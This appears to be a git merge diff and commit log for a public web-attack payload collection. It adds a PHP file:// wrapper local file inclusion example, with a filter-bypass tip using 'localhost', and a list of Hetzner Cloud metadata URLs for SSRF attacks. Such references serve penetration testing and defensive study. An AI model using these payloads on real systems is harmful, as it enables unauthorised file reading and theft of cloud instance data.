Merge d658aa026a into 293723d49d

Merge pull request #712 from bsysop/patch-4
Adding "Hetzner Cloud" to the Summary
2024-05-09 07:36:09 +02:00 · 2024-04-06 13:06:19 +04:00 · 2024-04-05 18:55:52 +02:00 · 2024-04-05 11:55:54 -03:00 · 2024-04-05 15:53:05 +02:00 · 2024-04-04 23:43:34 -03:00
2 changed files with 22 additions and 1 deletions
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos

 ## LFI / RFI using wrappers

+### Wrapper file://
+It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
+
+```shell
+http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
+```
+Note that using `localhost` above bypasses `file:///` filtering.
+
 ### Wrapper php://filter

 The part "`php://filter`" is case insensitive
@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 * [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
-* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
+* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -52,6 +52,7 @@
  * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
  * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
  * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
+  * [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud)
  * [SSRF URL for Docker](#ssrf-url-for-docker)
  * [SSRF URL for Rancher](#ssrf-url-for-rancher)

@ -805,6 +806,18 @@ http://100.100.100.200/latest/meta-data/instance-id
 http://100.100.100.200/latest/meta-data/image-id
 ```

+### SSRF URL for Hetzner Cloud
+
+```powershell
+http://169.254.169.254/hetzner/v1/metadata
+http://169.254.169.254/hetzner/v1/metadata/hostname
+http://169.254.169.254/hetzner/v1/metadata/instance-id
+http://169.254.169.254/hetzner/v1/metadata/public-ipv4
+http://169.254.169.254/hetzner/v1/metadata/private-networks
+http://169.254.169.254/hetzner/v1/metadata/availability-zone
+http://169.254.169.254/hetzner/v1/metadata/region
+```
+
 ### SSRF URL for Kubernetes ETCD

 Can contain API keys and internal ip and ports
Author	SHA1	Message	Date
n3rada	23541a1a78	Merge `d658aa026a` into `293723d49d`	2024-04-06 13:06:19 +04:00
Swissky	293723d49d	Merge pull request #712 from bsysop/patch-4 Adding "Hetzner Cloud" to the Summary	2024-04-05 18:55:52 +02:00
bsysop	dc461f170e	Adding "Hetzner Cloud" to the Summary	2024-04-05 11:55:54 -03:00
Swissky	9571306b9f	Merge pull request #711 from bsysop/patch-3 Adding Hetzner Cloud Metadata URL	2024-04-05 15:53:05 +02:00
bsysop	3c9fdec3da	Adding Hetzner Cloud Metadata URL https://docs.hetzner.cloud/#server-metadata	2024-04-04 23:43:34 -03:00
n3rada	d658aa026a	Adding `file://` wrapper	2024-02-24 19:52:40 +01:00